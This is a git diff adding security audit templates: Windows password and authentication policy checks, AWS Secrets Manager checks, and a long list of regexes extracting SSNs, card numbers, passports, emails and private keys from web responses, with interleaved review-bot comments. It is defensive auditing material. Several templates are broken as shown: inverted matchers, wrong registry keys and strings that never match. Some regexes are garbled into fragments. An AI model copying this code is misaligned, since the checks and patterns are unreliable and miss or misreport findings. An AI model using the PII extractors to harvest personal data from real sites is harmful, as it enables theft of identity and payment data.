+ Legacy authentication methods such as LM and NTLMv1 are vulnerable to brute-force and pass-the-hash attacks.
+ remediation: |
+ Disable LM and NTLMv1 and enforce NTLMv2 or Kerberos for secure authentication.
+ tags: lm,ntlmv1,authentication,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ $level = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LmCompatibilityLevel' -ErrorAction SilentlyContinue).LmCompatibilityLevel; if ($level -lt 3 -or $level -eq $null) { if ($level -eq $null) {"LM Compatibility Level is not set"} else {"LM Compatibility Level is misconfigured (current value: $level)"}} else {"LM Compatibility Level is securely configured (current value: $level)"}
+
+ matchers:
+ - type: word
+ words:
+ - "LM Compatibility Level is misconfigured"
diff --git a/poc/auth/max-password-age-too-high.yaml b/poc/auth/max-password-age-too-high.yaml
new file mode 100644
index 0000000000..fe14caa08e
--- /dev/null
+++ b/poc/auth/max-password-age-too-high.yaml
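Review bot: The threshold `$level -lt 3` only catches hosts that still send LM/NTLMv1 responses; a host at level 3 or 4 still accepts LM and NTLMv1 authentication as a server, which is what the name "LM and NTLMv1 Authentication Enabled" describes. Refusing them requires `LmCompatibilityLevel` 5 (the CIS-recommended value), so the condition should read `if ($null -eq $level -or $level -lt 5)`. The "is not set" branch also prints a message the matcher does not match, so an absent value is silently treated as compliant; if that is intentional because current Windows releases default to 3, the description should say so rather than leave the reader to infer it.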
@@ -0,0 +1,30 @@
+id: max-password-age-too-high
+
+info:
+  name: Maximum Password Age Set Too High or Unlimited
+  author: princechaddha
+  severity: medium
+  description: Checks if the maximum password age allows passwords to be used indefinitely.
+  impact: |
+    Allowing long or unlimited password lifetimes increases the risk of compromised credentials.
+  remediation: |
+    Set a reasonable maximum password age to force regular password changes.
+  tags: policy,code,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - cmd
+    args:
+      - /c
+    pattern: "*.cmd"
+    source: |
+      net accounts
+
+    matchers:
+      - type: word
+        words:
+          - "Maximum password age (days): 0"
\ No newline at end of file
diff --git a/poc/auth/minimum-password-age-zero.yaml b/poc/auth/minimum-password-age-zero.yaml
new file mode 100644
index 0000000000..27f45aab90
--- /dev/null
+++ b/poc/auth/minimum-password-age-zero.yaml
@@ -0,0 +1,36 @@
+id: minimum-password-age-zero
+
+info:
+  name: Minimum Password Age Set to Zero
+  author: princechaddha
+  severity: medium
+  description: Checks if the minimum password age is set to zero, allowing immediate password changes and potential reuse.
+  impact: |
+    Allowing a password age of zero may lead to the rapid reuse of weak passwords, reducing account security.
+  remediation: |
+    Set a reasonable minimum password age to prevent users from reusing old passwords frequently.
+  tags: windows, password, policy, code, windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - cmd
+    args:
+      - /c
+    pattern: "*.cmd"
+    source: |
+      net accounts
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Minimum password age (days): 0"
+        negative: true
+
+      - type: word
+        words:
+          - "Minimum password age"
\ No newline at end of file
diff --git a/poc/auth/null-session-allowed.yaml b/poc/auth/null-session-allowed.yaml
new file mode 100644
index 0000000000..9fed414ca4
--- /dev/null
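Review bot: The word `Maximum password age (days): 0` is unlikely ever to match: `net accounts` pads the value column with a run of spaces after the colon, and in my recollection an unlimited age prints as `Unlimited` rather than `0`, so the one case the template targets is not reported and a genuinely high value (say 365) is never examined despite the name "Set Too High or Unlimited". A regex matcher tolerates the padding and covers both spellings: `- type: regex` / `regex:` / `- 'Maximum password age \(days\):\s+(?:Unlimited|0)\b'`; if "too high" is meant literally, add the day threshold to that pattern and name it in `description`. The same single-space literal is used by the minimum-password-age-zero hunk on this line and is affected by the same padding.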
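Review bot: The matcher logic is inverted relative to the template's name: with `matchers-condition: and`, the `negative: true` matcher on `Minimum password age (days): 0` makes the template report only when that string is absent, i.e. when the minimum age is not zero, while the impact text describes the zero case. Dropping the negative matcher and the second word matcher and matching with `- type: regex` / `regex:` / `- 'Minimum password age \(days\):\s+0\b'` reports the zero case and also tolerates the column padding that `net accounts` puts after the colon.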
+++ b/poc/auth/null-session-allowed.yaml
@@ -0,0 +1,32 @@
+id: null-session-allowed
+
+info:
+  name: Null Session Allowed
+  author: princechaddha
+  severity: high
+  description: Checks if null sessions are allowed via any entry in the NullSessionPipes registry key, posing a security risk.
+  impact: |
+    Allowing null sessions can lead to unauthorized access to network resources, increasing vulnerability to attacks.
+  remediation: |
+    Disable null sessions by ensuring no entries are allowed in the NullSessionPipes registry key.
+  tags: windows,null-session,code,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name 'NullSessionPipes').NullSessionPipes.Count -gt 0) { "Null sessions are allowed" }
+
+    matchers:
+      - type: word
+        words:
+          - "Null sessions are allowed"
\ No newline at end of file
diff --git a/poc/auth/password-complexity-disabled.yaml b/poc/auth/password-complexity-disabled.yaml
new file mode 100644
index 0000000000..0e9ba83367
--- /dev/null
+++ b/poc/auth/password-complexity-disabled.yaml
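Review bot: `.NullSessionPipes.Count -gt 0` counts every element, including an empty string left behind in an otherwise cleared REG_MULTI_SZ, and on domain controllers the default pipe list is, as far as I know, non-empty, so the finding fires on every DC without telling the analyst which pipes are actually exposed. Filtering blanks and printing the names keeps the existing word matcher working while making the output actionable: `$pipes = @((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -Name 'NullSessionPipes' -ErrorAction SilentlyContinue).NullSessionPipes | Where-Object { $_ -ne '' })` followed by `if ($pipes.Count -gt 0) { "Null sessions are allowed: $($pipes -join ', ')" }`. The sibling templates in this patch pass `-ErrorAction SilentlyContinue`; this one does not, so a missing value writes an error to the output stream instead of staying silent.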
@@ -0,0 +1,32 @@
+id: password-complexity-disabled
+
+info:
+  name: Password Complexity Requirements Disabled
+  author: princechaddha
+  severity: high
+  description: Checks if password complexity requirements are disabled.
+  impact: |
+    Disabling password complexity can lead to the use of weak, easily guessable passwords, increasing the risk of unauthorized access.
+  remediation: |
+    Enable password complexity requirements to enforce the use of strong, hard-to-guess passwords.
+  tags: windows,code,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LimitBlankPasswordUse').LimitBlankPasswordUse -eq 0) { "Password complexity is disabled" }
+
+    matchers:
+      - type: word
+        words:
+          - "Password complexity is disabled"
diff --git a/poc/auth/password-history-size-low.yaml b/poc/auth/password-history-size-low.yaml
new file mode 100644
index 0000000000..b45d8de928
--- /dev/null
+++ b/poc/auth/password-history-size-low.yaml
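Review bot: The value the script reads, `LimitBlankPasswordUse` under `Control\Lsa`, backs the policy "Accounts: Limit local account use of blank passwords to console logon only"; it has nothing to do with "Password must meet complexity requirements", so the template reports blank-password network logon being permitted while labelling it disabled complexity. Either rename the id, name and messages to describe the blank-password setting, or read the complexity policy from a security-policy export, e.g. `secedit /export /cfg "$env:TEMP\secpol.cfg" | Out-Null` then `if (Select-String -Path "$env:TEMP\secpol.cfg" -Pattern '^PasswordComplexity\s*=\s*0') { "Password complexity is disabled" }` (this needs an elevated shell, which `description` should state). Unlike its siblings the lookup has no `-ErrorAction SilentlyContinue`, so a missing value errors instead of printing nothing.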
@@ -0,0 +1,32 @@
+id: password-history-size-low
+
+info:
+  name: Password History Size Too Low
+  author: princechaddha
+  severity: medium
+  description: Checks if the password history count is too low or not configured, allowing password reuse.
+  impact: |
+    A low or unset password history setting may allow users to reuse recently used passwords, increasing the risk of password compromise.
+  remediation: |
+    Increase the password history count to at least 24 previous passwords to prevent rapid reuse of old passwords.
+  tags: password,history,code,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'PasswordHistorySize' -ErrorAction SilentlyContinue; if ($null -eq $policy.PasswordHistorySize -or $policy.PasswordHistorySize -lt 24) { "Password history size is too low or not configured." }
+
+    matchers:
+      - type: word
+        words:
+          - "Password history size is too low or not configured."
\ No newline at end of file
diff --git a/poc/auth/password-reset-lock-screen-enabled.yaml b/poc/auth/password-reset-lock-screen-enabled.yaml
new file mode 100644
index 0000000000..5efb96047f
--- /dev/null
+++ b/poc/auth/password-reset-lock-screen-enabled.yaml
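Review bot: I am not aware of a `PasswordHistorySize` value under `HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`; the history length is part of the account policy that `net accounts` prints as "Length of password history maintained", so with `-ErrorAction SilentlyContinue` the lookup returns `$null` on every host and the template reports "too low or not configured" unconditionally. Consider the approach the max-password-age-too-high template in this patch takes and parse `net accounts`, e.g. `$h = (net accounts | Select-String 'Length of password history maintained:\s+(\S+)').Matches[0].Groups[1].Value` and `if ($h -eq 'None' -or [int]$h -lt 24) { "Password history size is too low or not configured." }`, including the found value in the message so the finding is self-explanatory. The threshold of 24 appears only in `remediation`; naming it in `description` as well tells the reader what "too low" means.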
@@ -0,0 +1,32 @@
+id: password-reset-lock-screen-enabled
+
+info:
+  name: Password Reset from Lock Screen Enabled
+  author: princechaddha
+  severity: medium
+  description: Checks if password reset options are available on the lock screen, which can lead to unauthorized access.
+  impact: |
+    Allowing password resets from the lock screen could permit attackers to reset passwords without authorization.
+  remediation: |
+    Disable password reset options on the lock screen.
+  tags: password,code,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      if ((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' -Name 'DisablePasswordReset' -ErrorAction SilentlyContinue).DisablePasswordReset -eq 0) { "Password reset from lock screen is enabled." }
+
+    matchers:
+      - type: word
+        words:
+          - "Password reset from lock screen is enabled."
diff --git a/poc/auth/plaintext-passwords-in-memory.yaml b/poc/auth/plaintext-passwords-in-memory.yaml
new file mode 100644
index 0000000000..f7fadfd253
--- /dev/null
+++ b/poc/auth/plaintext-passwords-in-memory.yaml
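Review bot: With `-ErrorAction SilentlyContinue` an absent `DisablePasswordReset` yields `$null`, and `$null -eq 0` is false in PowerShell, so the template fires only when the value is explicitly 0 and stays silent when the policy has never been set — the opposite of how password-history-size-low in this patch treats a missing value. State in `description` which behaviour is intended, e.g. `description: Reports an explicit DisablePasswordReset=0 under HKLM\SOFTWARE\Policies\Microsoft\Windows\System; an absent value is treated as not configured and not reported.`, or extend the condition to `$null -eq $v -or $v -eq 0` if the default state is what is being audited.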
@@ -0,0 +1,32 @@
+id: plaintext-passwords-in-memory
+
+info:
+  name: Plaintext Passwords Stored in Memory
+  author: princechaddha
+  severity: high
+  description: Checks if passwords are stored in memory in plaintext, potentially exposing sensitive information to unauthorized memory access.
+  impact: |
+    Storing passwords in plaintext in memory can expose sensitive credentials to attackers who gain access to memory dumps or can read memory directly, leading to unauthorized access and data breaches.
+  remediation: |
+    Ensure that all sensitive data, especially passwords, are stored in memory in an encrypted or hashed format to mitigate the risk of exposure.
+  tags: windows,security,credentials,windows-audit
+
+self-contained: true
+
+code:
+  - pre-condition: |
+      IsWindows();
+    engine:
+      - powershell
+      - powershell.exe
+    args:
+      - -ExecutionPolicy
+      - Bypass
+    pattern: "*.ps1"
+    source: |
+      if ((Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -ErrorAction SilentlyContinue).UseLogonCredential -eq 1) { "Plaintext passwords are stored in memory." }
+
+    matchers:
+      - type: word
+        words:
+          - "Plaintext passwords are stored in memory."
\ No newline at end of file
diff --git a/poc/auth/secret-manager-inuse.yaml b/poc/auth/secret-manager-inuse.yaml
new file mode 100644
index 0000000000..39be6483e7
--- /dev/null
+++ b/poc/auth/secret-manager-inuse.yaml
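Review bot: The remediation text ("stored in memory in an encrypted or hashed format") does not match what the script checks: the finding is WDigest credential caching (`UseLogonCredential` = 1), and the fix is to turn that value off, so suggest `remediation: |` / `Set UseLogonCredential under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to 0 (DWORD) and reboot so LSASS stops retaining the cleartext logon credential.` The condition only matches an explicit 1; on older Windows versions where WDigest caching is on by default and the value is absent, `$null -eq 1` is false and the host is not flagged, so `description` should say whether an absent value counts as a pass. `tags` omits `code`, which every other Windows code template in this patch carries.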
@@ -0,0 +1,38 @@
+id: secret-manager-inuse
+
+info:
+  name: Secret Manager In Use
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Ensure that Amazon Secrets Manager service is used in your AWS account to manage access credentials (i.e. secrets) such as API keys, OAuth tokens and database credentials.
+  impact: |
+    AWS Secrets Manager improves security by securely managing and rotating sensitive credentials, reducing the risk of exposure and unauthorized access.
+  remediation: |
+    Ensure AWS Secrets Manager is used to securely store, manage, and rotate sensitive credentials such as API keys, database passwords, and tokens, and remove hard-coded secrets from applications.
+  reference:
+    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/secrets-manager-in-use.html
+    - https://docs.aws.amazon.com/secretsmanager/latest/userguide/intro.html
+  tags: cloud,devops,aws,amazon,secret-manager,aws-cloud-config
+
+variables:
+  region: "us-west-2"
+
+self-contained: true
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json
+
+    matchers:
+      - type: word
+        words:
+          - '[]'
+        negative: true
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Secrets Manager In Use in " + region + " AWS region"'
\ No newline at end of file
diff --git a/poc/auth/secret-rotation-enabled.yaml b/poc/auth/secret-rotation-enabled.yaml
new file mode 100644
index 0000000000..69fc835560
--- /dev/null
+++ b/poc/auth/secret-rotation-enabled.yaml
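Review bot: The only matcher is a negative word match on `[]`, so any CLI failure (missing credentials, wrong region, expired token) prints an error message instead of `[]` and is reported as "Secrets Manager In Use". Requiring the output to actually be a JSON array guards that: add `matchers-condition: and` and a second matcher `- type: regex` / `regex:` / `- '^\s*\['`. The `description` reads as a rule that should flag accounts *not* using Secrets Manager, whereas the template reports the compliant state; if that is intended, saying so in `description` avoids readers assuming the matcher is inverted.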
@@ -0,0 +1,58 @@
+id: secrets-rotation-enabled
+
+info:
+  name: Secret Rotation Enabled
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Ensure that AWS Secrets Manager service is configured to automatically rotate your service or database secrets (i.e. enable automatic rotation feature for your secrets).
+  impact: |
+    Secret rotation disabled in AWS increases the risk of credential compromise and prolonged unauthorized access due to outdated or exposed secrets.
+  remediation: |
+    Enable automatic secret rotation in AWS Secrets Manager by configuring a rotation schedule and associating a Lambda function to periodically update and securely rotate the secrets.
+  reference:
+    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/rotation-enabled.html
+    - https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/rotate-secret.html
+  tags: cloud,devops,aws,amazon,secrets-manager,aws-cloud-config
+
+variables:
+  region: "us-west-2"
+
+flow: |
+  code(1)
+  for(let SecretListName of iterate(template.secrets)){
+    set("secretlist", SecretListName)
+    code(2)
+  }
+
+self-contained: true
+
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json
+
+    extractors:
+      - type: json
+        name: secrets
+        internal: true
+        json:
+          - '.[]'
+
+  - engine:
+      - sh
+      - bash
+    source: |
+      aws secretsmanager describe-secret --region $region --secret-id $secretlist --query 'RotationEnabled'
+
+    matchers:
+      - type: word
+        words:
+          - "false"
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Secrets Rotation " + secretlist + " is disabled"'
\ No newline at end of file
diff --git a/poc/auth/secret-rotation-interval.yaml b/poc/auth/secret-rotation-interval.yaml
new file mode 100644
index 0000000000..28364043d5
--- /dev/null
+++ b/poc/auth/secret-rotation-interval.yaml
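Review bot: `describe-secret --query 'RotationEnabled'` prints `null`, not `false`, for a secret on which rotation was never configured (the field is absent from the response, as far as I recall), so the most common non-compliant case never matches the single `"false"` word; add `- "null"` to `words`. The id `secrets-rotation-enabled` also differs from the file name `secret-rotation-enabled.yaml` and from the `secret-rotation-interval` id alongside it; aligning them keeps template ids predictable for anyone filtering by id.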
@@ -0,0 +1,58 @@
+id: secret-rotation-interval
+
+info:
+  name: Secret Rotation Enabled
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Ensure that the rotation interval for your AWS Secrets Manager secrets is configured to meet security and compliance requirements.
+  impact: |
+    Disabling secret rotation intervals increases the risk of long-term exposure to compromised credentials, making the system vulnerable to unauthorized access.
+  remediation: |
+    Enable automatic secret rotation in AWS by configuring AWS Secrets Manager with a defined rotation interval (e.g., every 30 days) and using Lambda functions to automate the rotation process, ensuring credentials are regularly updated and secure.
+  reference:
+    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/rotation-interval.html
+    - https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/rotate-secret.html
+  tags: cloud,devops,aws,amazon,secret-manager,aws-cloud-config
+
+variables:
+  region: "us-west-2"
+
+flow: |
+  code(1)
+  for(let SecretListName of iterate(template.secrets)){
+    set("secretlist", SecretListName)
+    code(2)
+  }
+
+self-contained: true
+
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json
+
+    extractors:
+      - type: json
+        name: secrets
+        internal: true
+        json:
+          - '.[]'
+
+  - engine:
+      - sh
+      - bash
+    source: |
+      aws secretsmanager describe-secret --region $region --secret-id $secretlist --query 'RotationRules.AutomaticallyAfterDays'
+
+    matchers:
+      - type: word
+        words:
+          - "false"
+
+    extractors:
+      - type: dsl
+        dsl:
+          - '"Secret Rotation Interval " + secretlist + " is not defined"'
\ No newline at end of file
diff --git a/poc/auth/secrets-patterns-pii.yaml b/poc/auth/secrets-patterns-pii.yaml
new file mode 100644
index 0000000000..c13ac3445a
--- /dev/null
+++ b/poc/auth/secrets-patterns-pii.yaml
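Review bot: The matcher word `"false"` can never match: `--query 'RotationRules.AutomaticallyAfterDays'` prints an integer or `null`, so this template produces no findings at all. Match `- "null"` instead, and note that a secret rotated via `RotationRules.ScheduleExpression` may legitimately have no `AutomaticallyAfterDays`; querying `RotationRules` as a whole and matching `null` avoids flagging those. `info.name` is a copy of the previous template's "Secret Rotation Enabled" and should read "Secret Rotation Interval" to match the id and the DSL message.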
@@ -0,0 +1,812 @@ +id: secrets-patterns-pii + +info: + name: Secrets Patterns (PII) + author: dwisiswant0 + reference: + - https://github.com/mazen160/secrets-patterns-db # db/pii-stable.yml (3f9f67a8f2b6e140a50a226041e9593fc2f5637e) + severity: info + tags: global-matchers,exposure,token,key,api,secret,password,generic + +http: + - global-matchers: true + extractors: + - type: regex + name: times + regex: + - \d{1,2}:\d{2} ?(?:[ap]\.?m\.?)?|\d[ap]\.?m\.? + part: body + - type: regex + name: phones + regex: + - >- + ((?:(?- + ((?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*(?:[2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|(?:[2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?(?:[2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?(?:[0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(?:\d+)?)) + part: body + - type: regex + name: emails + regex: + - >- + ([a-z0-9!#$%&'*+\/=?^_`{|.}~-]+@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?) + part: body + - type: regex + name: street_addresses + regex: + - >- + \d{1,4} + [\w\s]{1,20}(?:street|st|avenue|ave|road|rd|highway|hwy|square|sq|trail|trl|drive|dr|court|ct|park|parkway|pkwy|circle|cir|boulevard|blvd)\W?(?=\s|$) + part: body + - type: regex + name: po_boxes + regex: + - P\.? ?O\.? 
Box \d+ + part: body + - type: regex + name: ukphones + regex: + - >- + ^\s*\(?(020[7,8]{1}\)?[ ]?[1-9]{1}[0-9{2}[ + ]?[0-9]{4})|(0[1-8]{1}[0-9]{3}\)?[]?[1-9]{1}[0-9]{2}[ + ]?[0-9]{3})\s*$ + part: body + - type: regex + name: email_3 + regex: + - \b[\w\-+.]+@+\w+.+[A-z]{3} + part: body + - type: regex + name: ssn_3 + regex: + - "\b(?!000|666)[0-8][0-9]{2}-(?!00)[0-9]{2}-(?!0000)[0-9]{4}\b" + part: body + - type: regex + name: ssn_number + regex: + - >- + (?!000|666|333)0*(?:[0-6][0-9][0-9]|[0-7][0-6][0-9]|[0-7][0-7][0-2])[-](?!00)[0-9]{2}[- + ](?!0000)[0-9]{4} + part: body + - type: regex + name: visa_credit_card + regex: + - 4[0-9]{15} + part: body + - type: regex + name: american_express_creditcard + regex: + - 3[47][0-9]{13} + part: body + - type: regex + name: otp + regex: + - ^[0-9]{6}$ + part: body + - type: regex + name: credit_card_2 + regex: + - >- + 4[0-9]{12}(?:[0-9]{3})?|(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12} + |3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|6(?:011|5[0-9]{2})[0-9]{12}|(?:2131|1800|35\d{3})\d{11} + part: body + - type: regex + name: uk_phone_numbers + regex: + - \b([0O]?[1lI][1lI])?[4A][4A][\dOIlZEASB]{10,11}\b + part: body + - type: regex + name: us_phone_numbers + regex: + - >- + \b((\+|\b)[1l][\-\. ])?\(?\b[\dOlZSB]{3,5}([\-\. ]|\) + ?)[\dOlZSB]{3}[\-\. 
][\dOlZSB]{4}\b + part: body + - type: regex + name: email_addresses + regex: + - \b[a-z0-9._%\+\-—|]+@[a-z0-9.\-—|]+\.[a-z|]{2,6}\b + part: body + - type: regex + name: credit_card_3 + regex: + - >- + \b((4\d{3}|5[1-5]\d{2}|2\d{3}|3[47]\d{1,2})[\s\-]?\d{4,6}[\s\-]?\d{4,6}?([\s\-]\d{3,4})?(\d{3})?)\b + part: body + - type: regex + name: amex_card + regex: + - \b3[47][0-9]{13}\b + part: body + - type: regex + name: bcglobal + regex: + - \b(6541|6556)[0-9]{12}\b + part: body + - type: regex + name: carte_blanche_card + regex: + - \b389[0-9]{11}\b + part: body + - type: regex + name: diners_club_card + regex: + - \b3(?:0[0-5]|[68][0-9])[0-9]{11}\b + part: body + - type: regex + name: discover_card + regex: + - >- + \b65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})\b + part: body + - type: regex + name: insta_payment_card + regex: + - \b63[7-9][0-9]{13}\b + part: body + - type: regex + name: jcb_card + regex: + - \b(?:2131|1800|35\d{3})\d{11}\b + part: body + - type: regex + name: korean_local_card + regex: + - \b9[0-9]{15}\b + part: body + - type: regex + name: laser_card + regex: + - \b(6304|6706|6709|6771)[0-9]{12,15}\b + part: body + - type: regex + name: maestro_card + regex: + - \b(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}\b + part: body + - type: regex + name: mastercard + regex: + - >- + \b(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})\b + part: body + - type: regex + name: solo_card + regex: + - \b(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}\b + part: body + - type: regex + name: switch_card + regex: + - >- + \b(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9] + part: body + - type: regex + name: argentina_national_identity_dni_number + regex: + - 
\d{2}\.\d{3}\.\d{3} + part: body + - type: regex + name: canada_passport_id + regex: + - \b[\w]{2}[\d]{6}\b + part: body + - type: regex + name: croatia_vat_id_card_number + regex: + - \bHR\d{11}\b + part: body + - type: regex + name: czech_republic_vat_id_card_number + regex: + - \bCZ\d{8,10}\b + part: body + - type: regex + name: denmark_personal_id_number + regex: + - \b\d{10}|\d{6}[-\s]\d{4}\b + part: body + - type: regex + name: france_national_id_card_cni + regex: + - \b\d{12}\b + part: body + - type: regex + name: france_social_security_number_insee + regex: + - \b\d{13}|\d{13}\s\d{2}\b + part: body + - type: regex + name: france_passport_id + regex: + - \b\d{2}11\d{5}\b + part: body + - type: regex + name: germany_id_card_number + regex: + - \bl\d{8}\b + part: body + - type: regex + name: germany_passport_id + regex: + - \b[cfghjk]\d{3}\w{5}\d\b + part: body + - type: regex + name: germany_drivers_license_id + regex: + - \b[\d\w]\d{2}[\d\w]{6}\d[\d\w]\b + part: body + - type: regex + name: ireland_personal_public_service_pps_number + regex: + - \b\d{7}\w{1,2}\b + part: body + - type: regex + name: netherlands_citizens_service_bsn_number + regex: + - \b\d{8}|\d{3}[-\.\s]\d{3}[-\.\s]\d{3}\b + part: body + - type: regex + name: poland_national_id_pesel + regex: + - \b\d{11}\b + part: body + - type: regex + name: portugal_citizen_card_number + regex: + - \d{9}[\w\d]{2}|\d{8}-\d[\d\w]{2}\d + part: body + - type: regex + name: spain_social_security_number_ssn + regex: + - \b\d{2}\/?\d{8}\/?\d{2}\b + part: body + - type: regex + name: spain_social_security_number_ssn_2 + regex: + - \b\d{3}[ -.]\d{2}[ -.]\d{4}\b` + part: body + - type: regex + name: sweden_passport_id + regex: + - \b\d{8}\b + part: body + - type: regex + name: united_kingdom_passport_id + regex: + - \b\d{9}\b + part: body + - type: regex + name: united_kingdom_drivers_license_id + regex: + - \b[\w9]{5}\d{6}[\w9]{2}\d{5}\b + part: body + - type: regex + name: 
united_kingdom_national_health_service_nhs_number + regex: + - \b\d{3}\s\d{3}\s\d{4}\b + part: body + - type: regex + name: ipv4 + regex: + - >- + (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) + part: body + - type: regex + name: prices + regex: + - '[$]\s?[+-]?[0-9]{1,3}(?:(?:,?[0-9]{3}))*(?:\.[0-9]{1,2})?' + part: body + - type: regex + name: hex_colors + regex: + - (#(?:[0-9a-fA-F]{8})|#(?:[0-9a-fA-F]{3}){1,2})\b + part: body + - type: regex + name: credit_cards + regex: + - ((?:(?:\d{4}[- ]?){3}\d{4}|\d{15,16}))(?![\d]) + part: body + - type: regex + name: visa_cards + regex: + - 4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4} + part: body + - type: regex + name: master_cards + regex: + - 5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4} + part: body + - type: regex + name: btc_addresses + regex: + - >- + (?- + ((git|ssh|http(s)?)|(git@[\w\.]+))(:(\/\/)?)([\w\.@\:/\-~]+)(\.git)(\/)? 
+ part: body + - type: regex + name: drivers_license_number_simplified + regex: + - ^[A-Z]{2}-\d{6}$ + part: body + - type: regex + name: passport_number_simplified_3 + regex: + - ^[A-Z]\d{7}$ + part: body + - type: regex + name: social_security_number_ssn_3 + regex: + - ^\d{3}-\d{2}-\d{4}$ + part: body + - type: regex + name: social_security_number_ssn_4 + regex: + - (?:\\b\\d{3}-?\\d{2}-?(\\d{4})\\b) + part: body + - type: regex + name: date_of_birth + regex: + - ^\d{2}/\d{2}/\d{4}$|^\d{4}-\d{2}-\d{2}$ + part: body + - type: regex + name: arista_network_configuration + regex: + - via\ \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3},\ \d{2}:\d{2}:\d{2} + part: body + - type: regex + name: bbva_compass_routing_number_california + regex: + - ^321170538$ + part: body + - type: regex + name: bank_of_america_routing_numbers_california + regex: + - ^(?:121|026)00(?:0|9)(?:358|593)$ + part: body + - type: regex + name: box_links + regex: + - https://app.box.com/[s|l]/\S+ + part: body + - type: regex + name: cve_number + regex: + - CVE-\d{4}-\d{4,7} + part: body + - type: regex + name: california_drivers_license + regex: + - ^[A-Z]{1}\d{7}$ + part: body + - type: regex + name: chase_routing_numbers_california + regex: + - ^322271627$ + part: body + - type: regex + name: cisco_router_config + regex: + - >- + service\ timestamps\ [a-z]{3,5}\ datetime\ + msec|boot-[a-z]{3,5}-marker|interface\ [A-Za-z0-9]{0,10}[E,e]thernet + part: body + - type: regex + name: citibank_routing_numbers_california + regex: + - ^32(?:11|22)71(?:18|72)4$ + part: body + - type: regex + name: dsa_private_key + regex: 